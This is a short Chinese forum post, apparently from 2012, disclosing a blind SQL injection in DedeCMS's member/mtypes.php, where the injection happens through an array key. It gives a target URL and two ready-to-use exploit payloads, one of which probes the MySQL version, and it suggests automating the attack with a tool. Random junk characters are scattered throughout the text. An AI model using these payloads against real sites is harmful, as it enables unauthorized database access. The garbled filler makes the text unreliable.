需要magic_quotes_gpc = Off,所以说是鸡肋啊.
2 P, b! N6 H" \. s
' H1 U& M9 g' n; p1 i c" k+ E( g3 @8 e6 ]* F3 G( y- ^1 G
发生在数组key里的注射漏洞,有点意思.6 x- w2 O- w; G" N; L; i7 N; l
) i0 N. |8 G' N; l5 G
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
/ b! w+ K. n$ j- d) t$ M2 m: Z+ p! n
& C" o9 x$ G0 ?$ [# y# khttp://www.xxx.com /dede/member/mtypes.php?dopost=save
% H3 ]5 b% w, K' ?, h ; M% R- @* D. O! o
exploit:/ C4 C$ B8 ?* E5 C" G
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
* R. N. o* G+ G* _# V; rmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r
7 J5 p2 `+ P. B O5 a( ~3 } |
发表于 2012-12-20 08:08:09
收藏
支持
反对